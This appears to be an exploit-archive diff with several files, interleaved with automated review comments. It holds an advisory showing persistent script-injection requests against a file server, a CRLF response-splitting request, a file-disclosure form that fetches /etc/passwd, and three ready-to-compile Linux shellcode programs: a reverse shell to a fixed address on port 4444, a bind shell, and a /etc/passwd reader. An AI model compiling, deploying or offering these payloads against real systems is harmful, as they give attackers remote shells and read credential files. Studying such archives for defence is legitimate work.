GET http://localhost:8080/Files/c[PERSISTENT SCRIPT CODE EXECUTION!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[345] Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Referer[http://localhost:8080/Files/]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Content-Type[text/html]
|
||||
Content-Length[345]
|
||||
Date[Mon, 25 Jan 2016 09:54:49 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
-
|
||||
Status: 200[OK]
|
||||
POST http://localhost:8080/API/NewTextFile Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
|
||||
Referer[http://localhost:8080/Files/]
|
||||
Content-Length[56]
|
||||
Connection[keep-alive]
|
||||
POST-Daten:
|
||||
path[%22%3E%3Cimg%3E%2520%22%3C[PERSISTENT INJECTED SCRIPT CODE VULNERABILITY!]%20src%3D%22c%22%3E]
|
||||
Response Header:
|
||||
Content-Length[2]
|
||||
Date[Mon, 25 Jan 2016 09:54:55 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
-
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/Files/ Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[9636] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Referer[http://localhost:8080/Files/]
|
||||
Connection[keep-alive]
|
||||
Cache-Control[max-age=0]
|
||||
Response Header:
|
||||
Content-Length[9636]
|
||||
Date[Mon, 25 Jan 2016 09:54:55 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
-
|
||||
Status: 200[OK]
|
||||
POST http://localhost:8080/API/CreateFolder Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[23] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
|
||||
Referer[http://localhost:8080/Files/]
|
||||
Content-Length[56]
|
||||
Connection[keep-alive]
|
||||
POST-Daten:
|
||||
path[%22%3E%3Cimg%3E%2520%22%3C[PERSISTENT INJECTED SCRIPT CODE VULNERABILITY!]%20src%3D%22c%22%3E]
|
||||
Response Header:
|
||||
Content-Length[23]
|
||||
Date[Mon, 25 Jan 2016 09:55:00 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
-
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/Files/c[PERSISTENT SCRIPT CODE EXECUTION!] Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[345] Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Referer[http://localhost:8080/Files/]
|
||||
Connection[keep-alive]
|
||||
Cache-Control[max-age=0]
|
||||
Response Header:
|
||||
Content-Type[text/html]
|
||||
Content-Length[345]
|
||||
Date[Mon, 25 Jan 2016 09:55:02 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
1.1
|
||||
The arbitrary file upload vulnerability can be patched by a secure parse and validation of the filename value in the upload POST method request.
|
||||
Restrict the input and disallow special chars or script code tags to prevent an attack. Disallow usage of multiple file extensions and approve them as well.
|
||||
|
||||
1.2
|
||||
The local command inject vulnerability can be patched by a secure parse and encode of the header location in the file dir listing index, were the devicename is displayed.
|
||||
|
||||
1.3
|
||||
The persistent input validation web vulnerability can be patched by a secure encode and parse of the `path` and `name (class)` values in
|
||||
the `NewTextFile` or `New Folder` modules. Disallow usage of special chars on input to prevent persistent script code injection attacks.
|
||||
Encode the index output values to prevent the execution point of the issue.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
1.1
|
||||
The security risk of the arbitrary file upload web vulnerability in the filename value on upload is estimated as high. (CVSS 7.3)
|
||||
|
||||
1.2
|
||||
The local command inject web vulnerability in the device name value is estimated as medium. (CVSS 6.1)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||
|
||||
|
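--- a/platforms/java/webapps/39334.txt
+++ b/platforms/java/webapps/39334.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/68022/info
+
+Yealink VoIP Phones are prone to an HTTP-response-splitting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
+
+Yealink VoIP Phones firmware 28.72.0.2 and hardware 28.2.0.128.0.0.0 are vulnerable; other versions may also be affected.
+
+GET /servlet?linepage=1&model=%0d%0a[Header]&p=dsskey&q=load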
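Review bot: The file ends at the request line `GET /servlet?linepage=1&model=%0d%0a[Header]&p=dsskey&q=load` and gives no remediation, although that line shows the defect the response-splitting description implies: the `model` value reaches a response header with its CR/LF intact. A one-line fix note would make it useful to defenders, e.g. `Fix: reject or strip CR and LF from any request value that is copied into a response header (here the model parameter of /servlet).` It also names only the vulnerable firmware `28.72.0.2` and hardware `28.2.0.128.0.0.0`, with no fixed version or vendor reference beyond the BID link, so a reader cannot tell whether later firmware is patched.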
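--- a/platforms/linux/shellcode/39336.c
+++ b/platforms/linux/shellcode/39336.c
@@ -0,0 +1,134 @@
+/*
+[+] Author : B3mB4m
+[~] Contact : b3mb4m@protonmail.com
+[~] Project : https://github.com/b3mb4m/Shellsploit
+[~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu
+
+
+#If you want test it, you must compile it within x86 OS.
+#Or basically you can get it with shellsploit.
+#Default setthings for port:4444 host:192.168.1.29
+
+00000000 31C0 xor eax,eax
+00000002 40 inc eax
+00000003 7448 jz 0x4d
+00000005 6A66 push byte +0x66
+00000007 58 pop eax
+00000008 99 cdq
+00000009 52 push edx
+0000000A 42 inc edx
+0000000B 52 push edx
+0000000C 89D3 mov ebx,edx
+0000000E 42 inc edx
+0000000F 52 push edx
+00000010 89E1 mov ecx,esp
+00000012 CD80 int 0x80
+00000014 93 xchg eax,ebx
+00000015 89D1 mov ecx,edx
+00000017 B03F mov al,0x3f
+00000019 CD80 int 0x80
+0000001B 49 dec ecx
+0000001C 79F9 jns 0x17
+0000001E B066 mov al,0x66
+00000020 87DA xchg ebx,edx
+00000022 68C0A8011D push dword 0x1d01a8c0
+00000027 6668115C push word 0x5c11
+0000002B 6653 push bx
+0000002D 43 inc ebx
+0000002E 89E1 mov ecx,esp
+00000030 6A10 push byte +0x10
+00000032 51 push ecx
+00000033 52 push edx
+00000034 89E1 mov ecx,esp
+00000036 CD80 int 0x80
+00000038 6A0B push byte +0xb
+0000003A 58 pop eax
+0000003B 99 cdq
+0000003C 89D1 mov ecx,edx
+0000003E 52 push edx
+0000003F 682F2F7368 push dword 0x68732f2f
+00000044 682F62696E push dword 0x6e69622f
+00000049 89E3 mov ebx,esp
+0000004B CD80 int 0x80
+0000004D 48 dec eax
+0000004E 31C0 xor eax,eax
+00000050 48 dec eax
+00000051 31FF xor edi,edi
+00000053 48 dec eax
+00000054 31F6 xor esi,esi
+00000056 48 dec eax
+00000057 31D2 xor edx,edx
+00000059 4D dec ebp
+0000005A 31C0 xor eax,eax
+0000005C 6A02 push byte +0x2
+0000005E 5F pop edi
+0000005F 6A01 push byte +0x1
+00000061 5E pop esi
+00000062 6A06 push byte +0x6
+00000064 5A pop edx
+00000065 6A29 push byte +0x29
+00000067 58 pop eax
+00000068 0F05 syscall
+0000006A 49 dec ecx
+0000006B 89C0 mov eax,eax
+0000006D 48 dec eax
+0000006E 31F6 xor esi,esi
+00000070 4D dec ebp
+00000071 31D2 xor edx,edx
+00000073 41 inc ecx
+00000074 52 push edx
+00000075 C6042402 mov byte [esp],0x2
+00000079 66C7442402115C mov word [esp+0x2],0x5c11
+00000080 C7442404C0A8011D mov dword [esp+0x4],0x1d01a8c0
+00000088 48 dec eax
+00000089 89E6 mov esi,esp
+0000008B 6A10 push byte +0x10
+0000008D 5A pop edx
+0000008E 41 inc ecx
+0000008F 50 push eax
+00000090 5F pop edi
+00000091 6A2A push byte +0x2a
+00000093 58 pop eax
+00000094 0F05 syscall
+00000096 48 dec eax
+00000097 31F6 xor esi,esi
+00000099 6A03 push byte +0x3
+0000009B 5E pop esi
+0000009C 48 dec eax
+0000009D FFCE dec esi
+0000009F 6A21 push byte +0x21
+000000A1 58 pop eax
+000000A2 0F05 syscall
+000000A4 75F6 jnz 0x9c
+000000A6 48 dec eax
+000000A7 31FF xor edi,edi
+000000A9 57 push edi
+000000AA 57 push edi
+000000AB 5E pop esi
+000000AC 5A pop edx
+000000AD 48 dec eax
+000000AE BF2F2F6269 mov edi,0x69622f2f
+000000B3 6E outsb
+000000B4 2F das
+000000B5 7368 jnc 0x11f
+000000B7 48 dec eax
+000000B8 C1EF08 shr edi,byte 0x8
+000000BB 57 push edi
+000000BC 54 push esp
+000000BD 5F pop edi
+000000BE 6A3B push byte +0x3b
+000000C0 58 pop eax
+000000C1 0F05 syscall
+*/
+
+//Project : https://github.com/b3mb4m/Shellsploit
+//This file created with shellsploit ..
+//19/01/2016 - 00:39:58
+//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
+
+unsigned char shellcode[] =
+"\x31\xc0\x40\x74\x48\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68\xc0\xa8\x01\x1d\x66\x68\x11\x5c\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x1d\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05";
+
+int main(void){
+(*(void(*)()) shellcode)();
+}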
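Review bot: The header comment does not say what the payload does, and its `#If you want test it, you must compile it within x86 OS` line is contradicted by the listing itself: the `xor eax,eax / inc eax / jz 0x4d` prologue at offset 0 appears to be a 32-bit/64-bit mode check, and everything from 0x4d on is 64-bit code run through a 32-bit disassembler, so the `dec eax` lines there are REX.W prefixes and the `outsb`/`das`/`jnc 0x11f` entries at 0xb3-0xb5 are the bytes of the embedded `//bin/sh` string, not instructions. A comment such as `// 0x00-0x4c: 32-bit path; 0x4d onward: 64-bit path (the listing is a 32-bit decode, so mnemonics after 0x4d are artifacts)` would stop readers taking those lines literally; the same caveat applies to 39337.c and 39338.c, whose listings are decoded the same way. The 32-bit half here does socket, connect to 192.168.1.29:4444 (`push dword 0x1d01a8c0` / `push word 0x5c11` with socketcall 3), a dup2 loop and execve, i.e. it connects out rather than binding, which the header should state so the file is not confused with 39337.c. In `main`, `(*(void(*)()) shellcode)();` converts an object pointer to a function pointer, which ISO C does not define, and it only runs because the `-z execstack` flag in the compile comment makes the data mapping executable; `void (*)(void)` is the prototyped form and the flag dependency deserves a comment beside the array.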
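--- a/platforms/linux/shellcode/39337.c
+++ b/platforms/linux/shellcode/39337.c
@@ -0,0 +1,179 @@
+/*
+[+] Author : B3mB4m
+[~] Contact : b3mb4m@protonmail.com
+[~] Project : https://github.com/b3mb4m/Shellsploit
+[~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu
+
+
+#If you want test it, you must compile it within x86 OS.
+#Or basically you can get it with shellsploit.
+#Default setthings for port:4444
+
+
+00000000 31C0 xor eax,eax
+00000002 40 inc eax
+00000003 7460 jz 0x65
+00000005 31DB xor ebx,ebx
+00000007 F7E3 mul ebx
+00000009 B066 mov al,0x66
+0000000B B301 mov bl,0x1
+0000000D 52 push edx
+0000000E 53 push ebx
+0000000F 6A02 push byte +0x2
+00000011 89E1 mov ecx,esp
+00000013 CD80 int 0x80
+00000015 89C6 mov esi,eax
+00000017 B066 mov al,0x66
+00000019 43 inc ebx
+0000001A 52 push edx
+0000001B 6668115C push word 0x5c11
+0000001F 6653 push bx
+00000021 89E1 mov ecx,esp
+00000023 6A10 push byte +0x10
+00000025 51 push ecx
+00000026 56 push esi
+00000027 89E1 mov ecx,esp
+00000029 CD80 int 0x80
+0000002B B066 mov al,0x66
+0000002D B304 mov bl,0x4
+0000002F 52 push edx
+00000030 56 push esi
+00000031 89E1 mov ecx,esp
+00000033 CD80 int 0x80
+00000035 B066 mov al,0x66
+00000037 B305 mov bl,0x5
+00000039 52 push edx
+0000003A 52 push edx
+0000003B 56 push esi
+0000003C 89E1 mov ecx,esp
+0000003E CD80 int 0x80
+00000040 93 xchg eax,ebx
+00000041 31C9 xor ecx,ecx
+00000043 B102 mov cl,0x2
+00000045 B03F mov al,0x3f
+00000047 CD80 int 0x80
+00000049 49 dec ecx
+0000004A 79F9 jns 0x45
+0000004C 92 xchg eax,edx
+0000004D 50 push eax
+0000004E 682F2F7368 push dword 0x68732f2f
+00000053 682F62696E push dword 0x6e69622f
+00000058 89E3 mov ebx,esp
+0000005A 50 push eax
+0000005B 53 push ebx
+0000005C 89E1 mov ecx,esp
+0000005E 50 push eax
+0000005F 89E2 mov edx,esp
+00000061 B00B mov al,0xb
+00000063 CD80 int 0x80
+00000065 48 dec eax
+00000066 31C0 xor eax,eax
+00000068 48 dec eax
+00000069 31FF xor edi,edi
+0000006B 48 dec eax
+0000006C 31F6 xor esi,esi
+0000006E 48 dec eax
+0000006F 31D2 xor edx,edx
+00000071 4D dec ebp
+00000072 31C0 xor eax,eax
+00000074 6A02 push byte +0x2
+00000076 5F pop edi
+00000077 6A01 push byte +0x1
+00000079 5E pop esi
+0000007A 6A06 push byte +0x6
+0000007C 5A pop edx
+0000007D 6A29 push byte +0x29
+0000007F 58 pop eax
+00000080 0F05 syscall
+00000082 49 dec ecx
+00000083 89C0 mov eax,eax
+00000085 4D dec ebp
+00000086 31D2 xor edx,edx
+00000088 41 inc ecx
+00000089 52 push edx
+0000008A 41 inc ecx
+0000008B 52 push edx
+0000008C C6042402 mov byte [esp],0x2
+00000090 66C7442402115C mov word [esp+0x2],0x5c11
+00000097 48 dec eax
+00000098 89E6 mov esi,esp
+0000009A 41 inc ecx
+0000009B 50 push eax
+0000009C 5F pop edi
+0000009D 6A10 push byte +0x10
+0000009F 5A pop edx
+000000A0 6A31 push byte +0x31
+000000A2 58 pop eax
+000000A3 0F05 syscall
+000000A5 41 inc ecx
+000000A6 50 push eax
+000000A7 5F pop edi
+000000A8 6A01 push byte +0x1
+000000AA 5E pop esi
+000000AB 6A32 push byte +0x32
+000000AD 58 pop eax
+000000AE 0F05 syscall
+000000B0 48 dec eax
+000000B1 89E6 mov esi,esp
+000000B3 48 dec eax
+000000B4 31C9 xor ecx,ecx
+000000B6 B110 mov cl,0x10
+000000B8 51 push ecx
+000000B9 48 dec eax
+000000BA 89E2 mov edx,esp
+000000BC 41 inc ecx
+000000BD 50 push eax
+000000BE 5F pop edi
+000000BF 6A2B push byte +0x2b
+000000C1 58 pop eax
+000000C2 0F05 syscall
+000000C4 59 pop ecx
+000000C5 4D dec ebp
+000000C6 31C9 xor ecx,ecx
+000000C8 49 dec ecx
+000000C9 89C1 mov ecx,eax
+000000CB 4C dec esp
+000000CC 89CF mov edi,ecx
+000000CE 48 dec eax
+000000CF 31F6 xor esi,esi
+000000D1 6A03 push byte +0x3
+000000D3 5E pop esi
+000000D4 48 dec eax
+000000D5 FFCE dec esi
+000000D7 6A21 push byte +0x21
+000000D9 58 pop eax
+000000DA 0F05 syscall
+000000DC 75F6 jnz 0xd4
+000000DE 48 dec eax
+000000DF 31FF xor edi,edi
+000000E1 57 push edi
+000000E2 57 push edi
+000000E3 5E pop esi
+000000E4 5A pop edx
+000000E5 48 dec eax
+000000E6 BF2F2F6269 mov edi,0x69622f2f
+000000EB 6E outsb
+000000EC 2F das
+000000ED 7368 jnc 0x157
+000000EF 48 dec eax
+000000F0 C1EF08 shr edi,byte 0x8
+000000F3 57 push edi
+000000F4 54 push esp
+000000F5 5F pop edi
+000000F6 6A3B push byte +0x3b
+000000F8 58 pop eax
+000000F9 0F05 syscall
+*/
+
+
+//Project : https://github.com/b3mb4m/Shellsploit
+//This file created with shellsploit ..
+//19/01/2016 - 00:36:45
+//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
+
+unsigned char shellcode[] =
+"\x31\xc0\x40\x74\x60\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x92\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05";
+
+int main(void){
+(*(void(*)()) shellcode)();
+}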
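--- a/platforms/linux/shellcode/39338.c
+++ b/platforms/linux/shellcode/39338.c
@@ -0,0 +1,102 @@
+/*
+[+] Author : B3mB4m
+[~] Contact : b3mb4m@protonmail.com
+[~] Project : https://github.com/b3mb4m/Shellsploit
+[~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu
+
+
+
+#If you want test it, you must compile it within x86 OS.
+#Or basically you can get it with shellsploit.
+#Default setthings for /etc/passwd
+
+
+00000000 31C0 xor eax,eax
+00000002 40 inc eax
+00000003 743A jz 0x3f
+00000005 31C9 xor ecx,ecx
+00000007 31C0 xor eax,eax
+00000009 31D2 xor edx,edx
+0000000B 51 push ecx
+0000000C B005 mov al,0x5
+0000000E 6873737764 push dword 0x64777373
+00000013 68632F7061 push dword 0x61702f63
+00000018 682F2F6574 push dword 0x74652f2f
+0000001D 89E3 mov ebx,esp
+0000001F CD80 int 0x80
+00000021 89D9 mov ecx,ebx
+00000023 89C3 mov ebx,eax
+00000025 B003 mov al,0x3
+00000027 66BAFF0F mov dx,0xfff
+0000002B 6642 inc dx
+0000002D CD80 int 0x80
+0000002F 31C0 xor eax,eax
+00000031 31DB xor ebx,ebx
+00000033 B301 mov bl,0x1
+00000035 B004 mov al,0x4
+00000037 CD80 int 0x80
+00000039 31C0 xor eax,eax
+0000003B B001 mov al,0x1
+0000003D CD80 int 0x80
+0000003F EB3F jmp short 0x80
+00000041 5F pop edi
+00000042 80770B41 xor byte [edi+0xb],0x41
+00000046 48 dec eax
+00000047 31C0 xor eax,eax
+00000049 0402 add al,0x2
+0000004B 48 dec eax
+0000004C 31F6 xor esi,esi
+0000004E 0F05 syscall
+00000050 6681ECFF0F sub sp,0xfff
+00000055 48 dec eax
+00000056 8D3424 lea esi,[esp]
+00000059 48 dec eax
+0000005A 89C7 mov edi,eax
+0000005C 48 dec eax
+0000005D 31D2 xor edx,edx
+0000005F 66BAFF0F mov dx,0xfff
+00000063 48 dec eax
+00000064 31C0 xor eax,eax
+00000066 0F05 syscall
+00000068 48 dec eax
+00000069 31FF xor edi,edi
+0000006B 40 inc eax
+0000006C 80C701 add bh,0x1
+0000006F 48 dec eax
+00000070 89C2 mov edx,eax
+00000072 48 dec eax
+00000073 31C0 xor eax,eax
+00000075 0401 add al,0x1
+00000077 0F05 syscall
+00000079 48 dec eax
+0000007A 31C0 xor eax,eax
+0000007C 043C add al,0x3c
+0000007E 0F05 syscall
+00000080 E8BCFFFFFF call dword 0x41
+00000085 2F das
+00000086 657463 gs jz 0xec
+00000089 2F das
+0000008A 7061 jo 0xed
+0000008C 7373 jnc 0x101
+0000008E 7764 ja 0xf4
+00000090 41 inc ecx
+00000091 2F das
+00000092 657463 gs jz 0xf8
+00000095 2F das
+00000096 7061 jo 0xf9
+00000098 7373 jnc 0x10d
+0000009A 7764 ja 0x100
+*/
+
+
+//Project : https://github.com/b3mb4m/Shellsploit
+//This file created with shellsploit ..
+//19/01/2016 - 00:29:31
+//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
+
+unsigned char shellcode[] =
+"\x31\xc0\x40\x74\x3a\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+
+int main(void){
+(*(void(*)()) shellcode)();
+}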
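Review bot: The 64-bit path modifies the payload in place: `call dword 0x41` at 0x80 leaves the address of the data at 0x85 in edi, and `xor byte [edi+0xb],0x41` at 0x42 then zeroes the `41` byte at 0x90 that separates the two copies of `/etc/passwd`, so `shellcode[]` must stay a writable, non-`const` array and the run depends on that mapping being both writable and executable. That is worth a comment beside `unsigned char shellcode[] =`, e.g. `// 64-bit path patches its own data at runtime: keep this array writable (no const) and executable (-z execstack).` The listing is a 32-bit decode of that 64-bit section, so the `dec eax` lines from 0x46 on are REX.W prefixes and the `das`/`gs jz`/`jo`/`jnc`/`ja` entries from 0x85 to 0x9a are the path string's bytes, which a one-line note above the listing should say; the `#If you want test it, you must compile it within x86 OS` line is also contradicted by the presence of that 64-bit section.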
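--- a/platforms/php/webapps/39332.txt
+++ b/platforms/php/webapps/39332.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/67481/info
+
+Wiser is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
+
+An attacker can exploit this issue to download backup files that contain sensitive information. Information harvested may aid in launching further attacks.
+
+Wiser 2.10 is vulnerable; other versions may also be affected.
+
+http://www.example.com/voip/sipserver/class/baixarBackup.php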
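Review bot: The file names the endpoint `http://www.example.com/voip/sipserver/class/baixarBackup.php` but never says whether it is reachable without authentication or what the fix is, so a defender has nothing to verify beyond the URL. The description reads as a direct download of backup files, so the remediation to record is an access check on that script and keeping backup archives outside the web root, e.g. `Fix: require authentication on baixarBackup.php and store backups outside the document root.` `Wiser 2.10 is vulnerable` is the only version statement and no fixed version is given.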
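--- a/platforms/php/webapps/39333.html
+++ b/platforms/php/webapps/39333.html
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/67935/info
+
+The Elegance theme for WordPress is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
+
+Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
+
+<html>
+<body>
+<form action="http://www.site.com/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="post">
+Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
+<input type="submit">
+</form>
+</body>
+</html>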
